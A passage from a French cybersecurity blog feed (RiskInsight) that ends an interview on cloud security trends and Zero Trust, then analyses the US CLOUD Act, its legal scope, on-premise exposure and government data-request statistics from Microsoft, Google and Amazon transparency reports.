<p style="text-align: justify;">Wavestone <strong>accompagne également les clients à contractualiser</strong> avec des fournisseurs cloud. Nous aidons nos clients à <strong>construire des landings zones</strong>, c’est-à-dire les bases des architecteurs de sécurité qui vont être déployée dans le cloud. Nos équipes sont intégrées dans des centres d’excellence cloud chez nos clients et travaillent tous les jours à la sécurisation des infrastructures de cloud. Nous avons également la capacité d’<strong>aider nos clients dans leur transformation agile</strong> et notamment sur les sujets DevSecOps, afin d’apporter la sécurité au plus près de leurs projets.</p>
<p style="text-align: justify;"> </p>
<h1>Quel avenir pour la sécurité du cloud ?</h1>
<p style="text-align: justify;">La tendance émergente du moment est le <strong>Zéro Trust</strong>. C’est un nouveau modèle de sécurité qui répond aux enjeux cloud et usages actuels de mobilités des personnes et de la donnée. Le modèle Zero Trust a pour objectif d’<strong>accorder l’accès sur le besoin d’en connaitre et donc de remettre la sécurité au plus proche des ressources</strong>.</p>
<p style="text-align: justify;">L’objectif est de remettre l’utilisateur au centre avec la garanti du moindre privilège et de contrôler l’accès à une ressource à chaque fois que quelqu’un en exprime le besoin. Cette vérification se fera quelle que soit son origine même si c’est un collaborateur interne. L’identité et l’authentification sont au centre, tout comme les moyens de détection et de contrôle.</p>
<p style="text-align: justify;">La définition des algorithmes d’attribution des moindres privilèges et la vérification systématique à chaque nouvelle demande d’entrée drainent de vastes sujets autour de la gouvernance des identités pour nos clients. Leur traduction technologique, comme avec Azure AD pour citer la technologie de Microsoft, nécessite de solides connaissances techniques et un accompagnement au changement pour être en mesure d’identifier et configurer les bons moyens d’authentification (MFA, attribution de droits temporaire, etc.) et de contrôles (Conditional Access Policy, sign-logs, etc.) disponibles.</p>
<p style="text-align: justify;">Ce modèle est <strong>particulièrement adapté à un usage cloud</strong> puisque la plupart des fournisseurs de cloud public permettent l’utilisation de technologies plus fiables et configurables qu’on-premise pour gérer les identités, l’authentification et la détection.</p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;"> </p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2021/12/les-enjeux-et-les-tendances-de-la-securite-du-cloud-risk-insight/">Les enjeux et les tendances de la sécurité du cloud, interview de Vincent Ferrie</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2021/12/les-enjeux-et-les-tendances-de-la-securite-du-cloud-risk-insight/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Le C.L.O.U.D Act. : Une manière de rendre les données « non-souveraines » ?</title>
		<link>https://www.riskinsight-wavestone.com/2021/11/le-cloud-act-une-maniere-de-rendre-les-donnees-non-souveraines/</link>
					<comments>https://www.riskinsight-wavestone.com/2021/11/le-cloud-act-une-maniere-de-rendre-les-donnees-non-souveraines/#respond</comments>
		
		<dc:creator><![CDATA[VincentFerrie]]></dc:creator>
		<pubDate>Wed, 03 Nov 2021 18:28:00 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Eclairage]]></category>
		<category><![CDATA[AWS]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Digital privacy]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=17239</guid>

					<description><![CDATA[<p>En 2013, le FBI a émis un mandat dénommé&#160;Stored Communications Act&#160;afin d’accéder à des courriels stockés en Irlande, dans l’un des datacenters de Microsoft, dans le cadre d’une enquête sur un trafic de drogue. Microsoft refusa de fournir ces informations,...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2021/11/le-cloud-act-une-maniere-de-rendre-les-donnees-non-souveraines/">Le C.L.O.U.D Act. : Une manière de rendre les données « non-souveraines » ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[


<p>En 2013, le FBI a émis un mandat dénommé&nbsp;<em>Stored Communications Act</em>&nbsp;afin d’accéder à des courriels stockés en Irlande, dans l’un des datacenters de Microsoft, dans le cadre d’une enquête sur un trafic de drogue. Microsoft refusa de fournir ces informations, car les données en Irlande se trouvent hors de la juridiction du mandat étasunien. Dans l’affaire Microsoft Corp. v. United States, le tribunal a jugé que&nbsp;<a href="https://harvardlawreview.org/2016/12/microsoft-corp-v-united-states/">«&nbsp;le gouvernement ne peut pas obliger les fournisseurs d’accès à Internet (FAI) à remettre des données stockées à l’étranger, même avec un mandat&nbsp;».</a></p>
<p>Pour résoudre ce problème, le gouvernement américain a décidé en 2018 de modifier la loi&nbsp;<em>Stored Communication Act</em>&nbsp;de 1986 en promulguant le C.L.O.U.D Act.</p>
<p>Le C.L.O.U.D Act est l’acronyme de&nbsp;<strong><em>Clarifying Lawful Overseas Use of Data Act</em></strong>, une loi fédérale visant à&nbsp;<strong>accélérer l’accès aux informations électroniques</strong>&nbsp;détenues par des fournisseurs sous juridiction des États-Unis et qui sont essentielles pour les enquêtes des partenaires étrangers <strong>concernant des infractions graves.</strong></p>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-17358" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/cloud-act-FR.png" alt="" width="1000" height="300" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/cloud-act-FR.png 1000w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/cloud-act-FR-437x131.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/cloud-act-FR-71x21.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/cloud-act-FR-768x230.png 768w" sizes="auto, (max-width: 1000px) 100vw, 1000px" /></p>
<p>Champ d&rsquo;application des données accessibles par le C.L.O.U.D Act :</p>
<ul>
<li>Contenu des communications électroniques stocké sur un support informatique</li>
<li>Contenu des communications électroniques détenu par un prestataire de service informatique à distance (Cloud)</li>
<li>Enregistrements relatifs à un service de communications électroniques ou à un service informatique à distance (Cloud)</li>
</ul>
<h2>Un processus contrôlé pour accéder aux données</h2>
<p>Tout d&rsquo;abord, les autorités américaines invoquant cette loi qui leur permet d’accéder au contenu de toutes les entreprises sous juridiction américaine, <strong>doivent obtenir un mandat préalable</strong>. <strong>Elles doivent prouver qu&rsquo;il existe une forte probabilité de trouver des preuves,</strong> liées à l&rsquo;enquête criminelle en cours, dans les données ciblées, <strong>que le crime soit perpétré par le client ou l&rsquo;entreprise elle-même.</strong></p>
<p>Une fois le mandat délivré, il doit être examiné et approuvé par un juge indépendant.</p>
<p><strong>La demande peut être émise sous ordonnance de confidentialité :</strong>&nbsp;les autorités judiciaires peuvent empêcher le Fournisseur de services Cloud (CSP) &nbsp;de notifier la demande au titulaire du compte. Les ordonnances de confidentialité sont alors examinées plus attentivement par le ministère de la justice.</p>
<p>Si le mandat est approuvé et qu’une demande est émise, le fournisseur de services ou le client, s’il en est informé, peut la contester&nbsp;<strong>sous 14 jours si :</strong></p>
<ul>
<li>Les données concernent une personne non américaine qui ne réside pas aux États-Unis, et/ou ;</li>
<li>Cette demande rentrerait en conflit avec la législation d’un pays étranger et l’exposerait à des sanctions.</li>
</ul>
<p>Des facteurs tels que l’importance de l’information, la spécificité de la demande ou la disponibilité de moyens alternatifs pour obtenir l’information seront analysés par le tribunal.</p>
<p><img loading="lazy" decoding="async" class="wp-image-17242 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-2-cloud-act-territoire.png" alt="" width="498" height="397" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-2-cloud-act-territoire.png 831w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-2-cloud-act-territoire-239x191.png 239w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-2-cloud-act-territoire-49x39.png 49w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-2-cloud-act-territoire-768x613.png 768w" sizes="auto, (max-width: 498px) 100vw, 498px" /></p>
<h2>C.L.O.U.D Act = fournisseur de Cloud&nbsp;?</h2>
<p>Le C.L.O.U.D Act&nbsp;<strong>ne vise pas seulement les fournisseurs de Cloud</strong>&nbsp;! Son périmètre est beaucoup plus large et&nbsp;<strong>inclut certains logiciels et fournisseurs déjà présents dans les SI de certaines entreprises.</strong></p>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-17286" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-3-clud-applicable-fr.png" alt="" width="974" height="130" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-3-clud-applicable-fr.png 974w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-3-clud-applicable-fr-437x58.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-3-clud-applicable-fr-71x9.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-3-clud-applicable-fr-768x103.png 768w" sizes="auto, (max-width: 974px) 100vw, 974px" /></p>
<ul>
<li><strong>Services informatiques à distance (RCS)</strong>: tout fournisseurs de services de stockage et de traitement informatique à des utilisateurs par le biais d’un système de communication électronique.</li>
<li><strong>Service de communication électronique (ECS)</strong>: tout service qui offre à ses utilisateurs la possibilité d’envoyer ou de recevoir des communications par moyen électronique ou filaire</li>
</ul>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-17282" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-3-bis-clud-applicable-fr.png" alt="" width="973" height="130" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-3-bis-clud-applicable-fr.png 973w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-3-bis-clud-applicable-fr-437x58.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-3-bis-clud-applicable-fr-71x9.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-3-bis-clud-applicable-fr-768x103.png 768w" sizes="auto, (max-width: 973px) 100vw, 973px" /></p>
<ul>
<li style="list-style-type: none;">
<ul>
<li><strong>Entreprises américaines</strong></li>
<li><strong>Entreprises étrangères situées en dehors des États-Unis </strong>mais fournissant des services aux États-Unis avec suffisamment de contact, en fonction de la nature, de la quantité et de la qualité des contacts de l’entreprise avec les États-Unis (promotion auprès de clients américains, sollicitation d’affaires auprès d’entreprises américaines, utilisation par des clients américains, etc.)</li>
</ul>
</li>
</ul>
<p>Outre le champ d’application évident de la définition du RCS et de l’ECS (fournisseurs d’e-mails, sociétés de téléphonie mobile, plateformes de médias sociaux, services de stockage en nuage, etc.), de nombreux logiciels et fournisseurs utilisés dans la plupart des SI entrent dans le champ d’application du C.L.O.U.D Act :</p>
<ul>
<li style="list-style-type: none;">
<ul>
<li>Toute la suite Microsoft Office (Outlook, Skype).</li>
<li>Appareils et services de sécurité et de réseau (proxies, pare-feu, anti-malware, etc.) fournis par des entreprises américaines (ex. : Symantec, Pulse, Citrix, etc.).</li>
<li>Logiciels d’entreprise qui traitent des données pour le compte d’entreprises ou citoyens américains (ex. : ordres de paiement).</li>
</ul>
</li>
</ul>
<h2><span style="background: white;">Sur les SI On Premise, le C.L.O.U.D ACT s’applique toujours</span></h2>
<p>Le C.L.O.U.D Act a un périmètre plus large que ce qu’il pourrait laisser penser et une implémentation <em>onpremise </em>peut donner une fausse perception de protection. Voici deux exemples de la manière dont les données peuvent être récupérées ou transmises :</p>
<h3><strong>1. Flux techniques sortants&nbsp;</strong></h3>
<p>De nombreux logiciels communiquent by-design avec l’infrastructure du fournisseur (rapports d’erreurs et d’utilisateurs, données de télémétrie).&nbsp;<strong>La plupart des flux sortants sont chiffrés via HTTPS mais les fournisseurs ne communiquent généralement pas sur le contenu</strong>&nbsp;des données envoyées ni ne précisent la destination et, dans la plupart des cas, ces flux sortants sont nécessaires à l’utilisation du service et&nbsp;<strong>ne peuvent être désactivés.</strong></p>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-17244" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-3-cloud-act.png" alt="" width="383" height="48" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-3-cloud-act.png 383w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-3-cloud-act-71x9.png 71w" sizes="auto, (max-width: 383px) 100vw, 383px" /></p>
<p>=&gt; Les autorités américaines peuvent récupérer les données souhaitées pour le C.L.O.U.D Act telles que les identifiants individuels</p>
<h3><strong>2. Equipes de support étrangères (<em>third-party support</em>)</strong></h3>
<p>Certaines équipes de support, localisées à l’étranger, effectuent leur service à distance, obligeant les fournisseurs à leur donner accès à aux données dans le monde entier (y compris le territoire américain).</p>
<p>Pour de nombreux logiciels, les fournisseurs de Cloud contractualisent avec des équipes de support étrangères qui peuvent être basées aux Etats-Unis ou sous juridiction américaine.</p>
<p>=&gt; Le fournisseur ou le tiers peut être contraint de<strong>&nbsp;transmettre les données en cas de demande émanant des autorités américaines.&nbsp;</strong></p>
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="aligncenter  wp-image-17246" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-cloud-4.png" alt="" width="323" height="99" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-cloud-4.png 264w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-cloud-4-71x22.png 71w" sizes="auto, (max-width: 323px) 100vw, 323px" /></p>
<h2>Qu&rsquo;en disent les fournisseurs de C.L.O.U.D&nbsp;?</h2>
<p>Les fournisseurs de Cloud assurent à leurs clients qu’ils ne divulgueront pas leurs données à moins d’y être obligés par la loi… ce qui est le cas s’ils sont contraints par le C.L.O.U.D Act… En cas de conflit de lois, comme avec le règlement GDPR, ces derniers assurent qu’ils&nbsp;<strong>prendront les mesures nécessaires</strong>&nbsp;<strong>pour s’opposer à la demande du gouvernement américain.</strong></p>
<p>Certains d’entre eux vont même plus loin, en assurant que les clés de chiffrement utilisées pour sécuriser les données du client ou la possibilité de forcer le déchiffrement ne seront pas fournies. Pour l’instant,&nbsp;<strong>le C.L.O.U.D Act ne mentionne pas les clés de chiffrement ni l’obligation de fournir des données non chiffrées.</strong></p>
<p>Deux fois par an,&nbsp;<strong>les fournisseurs de Cloud tels que Microsoft, Amazon et Google compilent dans des rapports le nombre et le détail des demandes qu’ils reçoivent des institutions du monde entier concernant la récupération de données clientes.</strong>&nbsp; Les demandes émises par des organisme américains comprennent les demandes liées au C.L.O.U.D Act. Le détail des lois utilisées pour émettre les demandes n’est pas spécifiée, ce qui signifie que nous ne pouvons pas savoir quelle proportion des demandes est liée au C.L.O.U.D Act.&nbsp;</p>
<h3>Type de données récupérées</h3>
<p>Les derniers rapports de Microsoft et Amazon, concernant les demandes entre juillet et décembre 2020 dans le monde, peuvent fournir plus d’informations sur le type de données demandées à&nbsp;<a href="https://www.microsoft.com/en-us/corporate-responsibility/law-enforcement-requests-report">Microsoft</a>&nbsp;et&nbsp;<a href="https://d1.awsstatic.com/certifications/Information_Request_Report_December_2020.pdf">Amazon</a>&nbsp;(Google ne fournit pas d’informations concernant la distinction entre les données de contenu et les données hors contenu) :</p>
<p><img loading="lazy" decoding="async" class="aligncenter  wp-image-17248" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-5-cloud-act.png" alt="" width="946" height="367" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-5-cloud-act.png 946w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-5-cloud-act-437x170.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-5-cloud-act-71x28.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-5-cloud-act-768x298.png 768w" sizes="auto, (max-width: 946px) 100vw, 946px" /></p>
<p>&nbsp;</p>
<p><span style="color: #00ccff;">% Content </span>: ce que les clients créent, communiquent et stockent sur ou par le biais des services Cloud, comme le contenu d&rsquo;un courriel ou les documents stockés sur OneDrive.</p>
<p><span style="color: #ffff00;"><span style="color: #ffcc00;">% Données sans contenu</span>&nbsp;</span>: Données autres que le contenu comprenant des informations basiques telles que l&rsquo;adresse électronique, le nom, le pays et l&rsquo;adresse IP au moment de l&rsquo;inscription, l&rsquo;historique des connexions IP ou les informations de facturation.</p>
<p><strong>% Aucune donnée trouvée</strong> : les données requises par le mandat sont introuvables.</p>
<p><span style="color: #ff0000;">% Rejeté</span> : impossible de divulguer les informations demandées (ne répondant pas aux exigences légales)</p>
<p>=&gt; <strong>40 % des demandes adressées à Microsoft n&rsquo;aboutissent pas</strong> : aucune donnée n&rsquo;est trouvée, ou la demande est rejetée.</p>
<p>=&gt; La<strong>&nbsp;plupart des demandes</strong>&nbsp;adressées à Microsoft et à AWS qui aboutissent à la&nbsp;<strong>divulgation de données concernent des données non liées au contenu</strong>&nbsp;(principalement des données de connexion type IP, metadata, etc.).</p>
<h3><span style="background: white;">Si on regarde de plus prêt …</span></h3>
<p>Il est nécessaire de se plonger dans les rapports de Microsoft et de Google, car Amazon ne fournit pas autant de détails dans ses rapports. Les services Google concernés par les demandes sont Youtube, Gmail, Google Voice et Blogger. Les services Microsoft concernés par les demandes sont Outlook, Skype, O365, Xbox, AZURE, etc.</p>
<p>D’un point de vue géographique, nous pouvons identifier les pays qui sont les plus concernés par ces demandes pour le second semestre 2020 :</p>
<p><strong>Microsoft</strong></p>
<p><img loading="lazy" decoding="async" class="aligncenter  wp-image-17250" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-6-cloud-act.png" alt="" width="439" height="341" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-6-cloud-act.png 4075w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-6-cloud-act-246x191.png 246w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-6-cloud-act-50x39.png 50w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-6-cloud-act-768x597.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-6-cloud-act-1536x1193.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-6-cloud-act-2048x1591.png 2048w" sizes="auto, (max-width: 439px) 100vw, 439px" /></p>
<p><strong>Google</strong></p>
<p><img loading="lazy" decoding="async" class="aligncenter  wp-image-17252" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-7-cloud-act.png" alt="" width="424" height="328" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-7-cloud-act.png 4098w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-7-cloud-act-247x191.png 247w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-7-cloud-act-50x39.png 50w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-7-cloud-act-768x593.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-7-cloud-act-1536x1187.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-7-cloud-act-2048x1582.png 2048w" sizes="auto, (max-width: 424px) 100vw, 424px" /></p>
<p>&nbsp;</p>
<ul>
<li><strong>Seuls quelques pays sont concernés par la grande majorité des demandes :</strong>
<ul>
<li><strong>Pour Microsoft : </strong>6 pays ont été concernés par 900 requêtes ou plus au cours du 2éme semestre 2020, ce qui représente plus de 77% de l&rsquo;ensemble des requêtes.</li>
<li><strong>Pour Google : </strong>11 pays ont été concernés par plus de 900 requêtes au cours du 2éme semestre 2020, ce qui représente plus de 90% du total des requêtes.</li>
</ul>
</li>
<li><strong>Les autorités françaises se situent à la 4e place de chaque fournisseur en ce qui concerne l&rsquo;émission de demandes :</strong>
<ul>
<li>Pour Microsoft 10% des demandes sont émises par les autorités françaises</li>
<li>Pour Google, 8% des demandes sont émises par les autorités françaises.</li>
</ul>
</li>
</ul>
<p>En outre, nous pouvons analyser le nombre de demandes qui aboutissent en prenant le nombre de données divulguées aux autorités et la proportion qu’elle représente par rapport au nombre total des demandes. <strong>Dans la suite de l&rsquo;article, nous parlerons de «&nbsp;divulgation des données&nbsp;» dans le cadre d’une requête de données ayant abouti pour les autorités.</strong></p>
<p><strong>Microsoft</strong></p>
<p><img loading="lazy" decoding="async" class="aligncenter  wp-image-17254" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-8-cloud-act.png" alt="" width="598" height="323" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-8-cloud-act.png 5342w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-8-cloud-act-353x191.png 353w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-8-cloud-act-71x39.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-8-cloud-act-768x415.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-8-cloud-act-1536x830.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-8-cloud-act-2048x1107.png 2048w" sizes="auto, (max-width: 598px) 100vw, 598px" /></p>
<p><strong>Google</strong></p>
<ul>
<li><img loading="lazy" decoding="async" class="aligncenter  wp-image-17256" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-9-cloud-act.png" alt="" width="594" height="321" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-9-cloud-act.png 5348w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-9-cloud-act-353x191.png 353w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-9-cloud-act-71x39.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-9-cloud-act-768x415.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-9-cloud-act-1536x830.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-9-cloud-act-2048x1107.png 2048w" sizes="auto, (max-width: 594px) 100vw, 594px" /><strong>Le pourcentage de demandes des autorités qui conduisent à la divulgation de données est assez similaire pour Microsoft et Google et se situe entre 50 % et 75 % (Microsoft) et entre 55 % et 88 % (Google).</strong></li>
<li>Cependant, il existe quelques disparités en fonction des pays.&nbsp;<strong>Par exemple, les autorités françaises ont obtenu l’accès aux données dans 52 % des cas suite à leur demande pour Microsoft</strong>, alors qu’elles ont obtenu l’accès aux données dans<strong>83 % des cas suite à leur demande pour Google.</strong></li>
</ul>
<p>Au vu des données brutes, on peut conclure à première vue que la divulgation de données aux autorités est plus probable sur les services de Google que pour ceux de Microsoft.&nbsp;<strong>Une explication peut être le fait que les services Google s’adressent davantage aux particuliers qu’aux entreprises et que les services Google sont plus largement utilisés</strong>&nbsp;(Outlook 400 millions d’utilisateurs contre Gmail 1,5 milliard d’utilisateurs). En outre, les demandes des autorités sont émises dans le cadre d’affaires pénales qui sont&nbsp;<strong>plus susceptibles de concerner des particuliers,</strong>&nbsp;ce qui signifie que ces demandes seront plus susceptibles d’être envoyées à Google.</p>
<h2><strong>Prise de recul – Comment les demandes des autorités ont-elles évolué depuis 2013 pour Google et Microsoft ?</strong></h2>
<p>Si nous compilons les rapports depuis 2013, nous pouvons identifier les tendances concernant la divulgation des données suite à la mise en œuvre du C.LO.U.D. Act.&nbsp;</p>
<p><img loading="lazy" decoding="async" class="aligncenter  wp-image-17258" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-10-cloud-act.png" alt="" width="703" height="442" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-10-cloud-act.png 5346w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-10-cloud-act-304x191.png 304w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-10-cloud-act-62x39.png 62w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-10-cloud-act-768x483.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-10-cloud-act-1536x965.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-10-cloud-act-2048x1287.png 2048w" sizes="auto, (max-width: 703px) 100vw, 703px" /></p>
<p><img loading="lazy" decoding="async" class="aligncenter  wp-image-17260" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-11-cloud-act.png" alt="" width="670" height="421" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-11-cloud-act.png 5346w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-11-cloud-act-304x191.png 304w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-11-cloud-act-62x39.png 62w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-11-cloud-act-768x483.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-11-cloud-act-1536x965.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-11-cloud-act-2048x1287.png 2048w" sizes="auto, (max-width: 670px) 100vw, 670px" /></p>
<p><img loading="lazy" decoding="async" class="aligncenter  wp-image-17262" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-12-cloud-act.png" alt="" width="640" height="368" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-12-cloud-act.png 5346w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-12-cloud-act-332x191.png 332w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-12-cloud-act-68x39.png 68w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-12-cloud-act-120x70.png 120w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-12-cloud-act-768x442.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-12-cloud-act-1536x884.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-12-cloud-act-2048x1178.png 2048w" sizes="auto, (max-width: 640px) 100vw, 640px" /></p>
<p><em>Il convient de noter que dans le rapport de Microsoft, les demandes rejetées et les demandes approuvées mais pour lesquelles aucune donnée n’est découverte sont classées dans la catégorie «&nbsp;Demande de données n’entraînant aucune divulgation de données&nbsp;».</em></p>
<ul>
<li><strong>Le nombre total de demandes semble se stabiliser autour de 20k-25K par semestres </strong>depuis le second semestre 2016, idem pour les <strong>comptes/utilisateurs concernés</strong>, qui se situent <strong>autour de 40K-50K demandes. </strong></li>
<li><strong>La distribution a tendance à évoluer, </strong>notamment en ce qui concerne<strong> les demandes rejetées :</strong>
<ul>
<li>Une petite partie concerne les données <em>content</em>, généralement environ 5% des demandes</li>
<li>Plus de la moitié sont des demandes de données <em>non content</em></li>
<li>Une part à peu près égale de 15% chaque semestre est constituée de demandes pour lesquelles les données n&rsquo;ont pas été trouvées</li>
<li><strong>Les demandes rejetées ont augmenté depuis 2013 pour atteindre près d&rsquo;un quart des résultats des demandes</strong></li>
<li><strong>Au total, plus de 40 % des demandes n&rsquo;aboutissent pas à la communication de données aux autorités</strong></li>
</ul>
</li>
</ul>
<p><strong>Google </strong></p>
<p><img loading="lazy" decoding="async" class="aligncenter  wp-image-17264" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-13-CA.png" alt="" width="639" height="362" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-13-CA.png 5342w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-13-CA-337x191.png 337w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-13-CA-69x39.png 69w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-13-CA-768x435.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-13-CA-1536x871.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-13-CA-2048x1161.png 2048w" sizes="auto, (max-width: 639px) 100vw, 639px" /></p>
<p><img loading="lazy" decoding="async" class="aligncenter  wp-image-17266" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-14-CA.png" alt="" width="626" height="368" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-14-CA.png 1246w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-14-CA-325x191.png 325w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-14-CA-66x39.png 66w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-14-CA-120x70.png 120w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/11/image-14-CA-768x452.png 768w" sizes="auto, (max-width: 626px) 100vw, 626px" /></p>
<ul>
<li><strong>Le nombre total de demandes est en croissance forte depuis 2018 pour atteindre plus d’une centaine de milliers de demandes durant son premier semestre. </strong>Cela peut s’expliquer par l’augmentation du nombre de pays qui sont inclus dans les rapports de Google (68 en 2013 contre 85 en 2020), l’omniprésence des services Google dans la vie individus, ainsi que la publication du C.L.O.U.D Act en 2018.</li>
<li>L’évolution des demandes tend vers l’augmentation de la&nbsp;<strong>divulgation des données à partir de 2018 et de la publication du C.L.O.U.D Act. Cependant, depuis le début de la publication des rapports en 2013, le pourcentage de données divulguées a toujours été compris entre trois et quatre cinquième.</strong></li>
</ul>
<h2>Conclusion</h2>
<p>Après analyse de la situation globale, tous les fournisseurs de Cloud ne sont pas dans la même situation :</p>
<ul>
<li><strong>Amazon ne fournit pas d’informations détaillées concernant l’emplacement des données divulguées ou le pourcentage de données divulguées sur l’ensemble des demandes.</strong></li>
<li><strong>Google reçoit plus de demandes de la part des institution que Microsoft et divulgue plus souvent des informations que Microsoft</strong>, ce qui peut s’expliquer par le fait que les services de Google sont davantage destinés aux particuliers qu’aux entreprises.</li>
</ul>
